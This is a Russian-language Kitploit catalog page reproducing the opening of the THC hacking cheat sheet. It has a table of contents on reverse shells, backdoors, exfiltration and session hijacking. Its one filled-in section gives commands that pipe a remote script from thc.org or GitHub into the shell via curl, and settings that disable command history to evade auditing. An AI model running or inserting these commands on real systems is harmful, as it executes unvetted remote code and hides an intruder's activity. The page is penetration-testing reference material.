Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
thc-tips-tricks-hacks-cheat-sheet — Различные советы и хитрости | Kitploit
Инструменты/GitHubGitHub/hackerschoice/thc-tips-tricks-hacks-cheat-sheet
OSINT (Разведка открытых источников)Механизмы персистентностиЛатеральное перемещениеЭксфильтрация данныхСбор информацииПост-эксплуатацияТестирование на ПроникновениеRed TeamingПодобранные Ресурсы

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Разработка Полезной Нагрузки
GitHubhackerschoice/thc-tips-tricks-hacks-cheat-sheet

thc-tips-tricks-hacks-cheat-sheet

Различные советы и хитрости

Репозиторий
3.9k471553 месяцев назадПроверено Kitploit

Любимые советы, трюки и хаки THC (Шпаргалка)

https://thc.org/tips

Собрание наших любимых трюков. Многие из этих трюков — не наши. Мы лишь их коллекционируем.

Мы показываем трюки «как есть» без объяснения, почему они работают. Вам нужно знать Linux, чтобы понять, как и почему они работают.

Есть трюки? Присоединяйтесь к нам https://thc.org/ops

  1. Bash
    1. Настройка Hack Shell
    2. Скрыть свои команды
    3. Скрыть параметры командной строки
    4. Скрыть сетевое соединение
    5. Скрыть процесс от пользователя
    6. Скрыть процесс от root
    7. Скрыть скрипты
    8. Скрыть от cat
    9. Выполнение параллельно с отдельными лог-файлами
  2. SSH
    1. Почти невидимый SSH
    2. Несколько оболочек через одно SSH/TCP-соединение
    3. SSH-туннель
    4. SSH socks5-туннель
    5. SSH к хосту за NAT
    6. SSH-пивот через ProxyJump
    7. SSHD от пользователя
  3. Сеть
    1. Обнаружение хостов
    2. Tcpdump
    3. Туннели и проброс
      1. Обратные порты raw TCP
      2. Обратный проброс HTTPS
      3. Отскок трафика с iptables
      4. Ghost IP / IP-спуфинг
      5. Разное
    4. Использовать любой инструмент через Socks-прокси
    5. Узнать свой публичный IP-адрес
    6. Проверить доступность со всего мира
    7. Проверить/просканировать открытые порты
    8. Взлом хэшей паролей
    9. Брутфорс паролей / ключей
  4. Загрузка/скачивание/экфильтрация данных
    1. Кодирование/декодирование файлов
    2. Передача файлов через cut & paste
    3. Передача файлов через tmux
    4. Передача файлов через screen
    5. Передача файлов через gs-netcat и sftp
    6. Передача файлов через HTTP
    7. Скачивание файла без curl
    8. Передача файлов через rsync
    9. Передача файлов на публичные дамп-сайты
    10. Передача файлов через WebDAV
    11. Передача файлов в Telegram
  5. Reverse Shell / Dumb Shell
    1. Reverse Shell'ы
      1. с gs-netcat (шифрованный)
      2. с Bash
      3. с cURL (шифрованный)
      4. с cURL (открытым текстом)
      5. с OpenSSL (шифрованный)
      6. с remote.moe (шифрованный)
      7. без /dev/tcp
      8. с Python
      9. с Perl
      10. с PHP
    2. Улучшение dumb shell
      1. Превратить reverse shell в pty shell
      2. Превратить reverse shell в полностью интерактивную оболочку
      3. Reverse shell с socat (полностью интерактивный)
  6. Бэкдоры
    1. gs-netcat
    2. sshx.io
    3. Самый маленький бэкдор SSHD
    4. Удалённый доступ ко всей сети
    5. Самый маленький PHP-бэкдор
    6. Самый маленький reverse DNS-tunnel бэкдор
    7. Локальный root-бэкдор
    8. Самораспаковывающийся имплант
  7. Разведка хоста
  8. Хаки оболочки
    1. Шреддинг файлов (безопасное удаление)
    2. Восстановить дату файла
    3. Очистить лог-файл
    4. Скрыть файлы от пользователя без прав root
    5. Сделать файл неизменяемым
    6. Сменить пользователя без sudo/su
    7. Обфусцировать и зашифровать пейлоад
    8. Развернуть бэкдор, не касаясь файловой системы
  9. Крипто
    1. Быстро сгенерировать случайный пароль
    2. Переносимые зашифрованные файловые системы Linux
      1. cryptsetup
      2. EncFS
    3. Шифрование файла
  10. Перехват и угон сессий
    1. Перехватить SHELL-сессию пользователя
    2. Перехватить все SHELL-сессии с помощью dtrace
    3. Перехватить все SHELL-сессии с помощью eBPF
    4. Перехватить SSH- или SSHD-сессию пользователя с помощью strace
    5. Перехватить исходящую SSH-сессию пользователя с помощью скрипта-обёртки
    6. Перехватить исходящую SSH-сессию пользователя с помощью SSH-IT
    7. Угон / перехват запущенной SSH-сессии
  11. VPN и оболочки
    1. Одноразовые root-серверы
    2. VPN/VPS-провайдеры
  12. OSINT: сбор разведданных
  13. Разное
    1. Инструменты ремесла
    2. Крутые команды Linux
    3. Шпаргалка по tmux
    4. Полезные команды
  14. Как стать хакером
  15. Другие сайты

1. Bash / Shell

1.i. Настройка Hack Shell (bash):

Сделайте BASH менее шумным. Отключает ~/.bash_history и многие другие вещи.```sh source <(curl -SsfL https://thc.org/hs)

Альтернативный URL:```sh
 source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)

А если нет curl/wget, используйте surl и (временно) установленный curl с помощью bin curl.```sh source <(surl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh)

Afterwards type bin curl to (temporarily) install curl (in memory).

HackShell делает гораздо больше, но самое главное — вот что:```sh
unset HISTFILE
[ -n "$BASH" ] && export HISTFILE="/dev/null"
export BASH_HISTORY="/dev/null"
export LANG=en_US.UTF-8
locale -a 2>/dev/null|grep -Fqim1 en_US.UTF || export LANG=en_US
export LESSHISTFILE=-
export REDISCLI_HISTFILE=/dev/null
export MYSQL_HISTFILE=/dev/null
TMPDIR="/tmp"
[ -d "/var/tmp" ] && TMPDIR="/var/tmp"
[ -d "/dev/shm" ] && TMPDIR="/dev/shm"
export TMPDIR
export PATH=".:${PATH}"
if [[ "$SHELL" == *"zsh" ]]; then
    PS1='%F{red}%n%f@%F{cyan}%m %F{magenta}%~ %(?.%F{green}.%F{red})%#%f '
else
    PS1='\[\033[36m\]\u\[\033[m\]@\[\033[32m\]\h:\[\033[33;1m\]\w\[\033[m\]\$ '
fi
alias wget='wget --no-hsts'
alias vi="vi -i NONE"
alias vim="vim -i NONE"
alias screen="screen -ln"

TERM=xterm reset -I
stty cols 400 # paste this on its own before pasting the next line:
resize &>/dev/null || { stty -echo;printf "\e[18t"; read -t5 -rdt R;IFS=';' read -r -a a <<< "${R:-8;25;80}";[ "${a[1]}" -ge "${a[2]}" ] && { R="${a[1]}";a[1]="${a[2]}";a[2]="${R}";};stty sane rows "${a[1]}" cols "${a[2]}";}
# stty sane rows 60 cols 160

Мы часто используем anew, и это быстрый обходной путь:```shell xanew() { awk 'hit[$0]==0 {hit[$0]=1; print $0}'; } which anew &>/dev/null || alias anew=xanew

Бонусный совет:
Любая команда, начинающаяся с « » (пробела), также [не попадает в историю](https://unix.stackexchange.com/questions/115917/why-is-bash-not-storing-commands-that-start-with-spaces).```
$  id

1.ii. Скройте свою команду / Демонизируйте свою команду

Скачать инструмент